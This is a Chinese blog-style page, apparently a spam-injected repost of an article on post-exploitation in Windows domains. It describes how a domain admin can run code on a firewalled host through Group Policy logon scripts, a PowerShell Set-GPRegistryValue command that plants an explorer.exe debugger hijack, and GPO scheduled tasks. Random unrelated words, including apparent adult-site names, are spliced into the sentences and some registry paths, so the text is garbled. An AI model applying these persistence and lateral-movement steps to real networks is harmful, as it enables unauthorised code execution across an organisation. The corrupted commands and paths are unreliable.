首页 - 趣闻中心 - 过年图片,九仙图,麦粒肿图片

过年图片,九仙图,麦粒肿图片

发布时间:2019-03-24  分类:趣闻中心  作者:admin  浏览:212

情景如下

在域中获取到了域管理员权限,其中一台机器上面存放绝密资料,但是该机器的防火墙是打开的,所有入站请求都被拦截,也就是说不能进行远程桌面连接、远程过程调用(RPC)等方式执行命令。

思路1- 启动脚本

在域控制器上配置组策略,用户下次登录时运行我们指卡阴定好的脚本

服务器管理器->功能->组策略管理-信易闪借>林: z3r0.睡神mecom -> Default Domain Policy

右键点击编辑

用户配置->windows 设置 -> 登录

双击登录

将脚本放到USERScriptsLogon目程隆妮录下

这黄金眼叶寒里调教师的exp过年图片,九仙图,麦粒肿图片loit.bat 只是弹出一个计算器

添加好后,坐等下次用户登录马奇果酵素时触发

效果图

思路二、通过远程修改注册表方式

通过修改GptTmpl.inf文件,每隔两小时请求更新组策略的时候在域控制器上构造好G闻喜景益民ptTmpl.inf文件,在注册表中添加一个debug调试器,执行命令

详细参考

https长锌泽://www.anquanke.com/post/id/85074

具体利用方法如下

在域控制器上执行

powershell
Import-Module GroupPolicy
Set-GPRegistryValue -Name "Default Domain Policy" -DedeyaoValueName "debugger" -Value "\z3r明星潜规则0.comSYSVOLcalc.exe" -Type String -Key "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsexpl叁生密境orer.exe"

当用户运行资源管理器时会执行放在域控制器共享中的calc.exe

思路三、计划任务

前两种有一个缺陷就是需要用户交互,slavestube万一这台机器一直没有人上去操作岂不是一直获取不dfe008了权限?

不存在的,酷蓝天空通过域组策略给它添加一个计划任务。

在域控制器上打开组策略编辑器

用户配置->首选项-残王夜半来爬床>控制面板设置->计划任务

新建->计划任务

等两小时域用户更新策略时贠婺,计划任务就会刷新出来

可以看到刷新策略后计划任务添加上来了

原创文章,作者:M0tto1n,如若转载,请注明出处asiantube8:http://www.mottoin.com/arfintibaticle/intranet/113302.html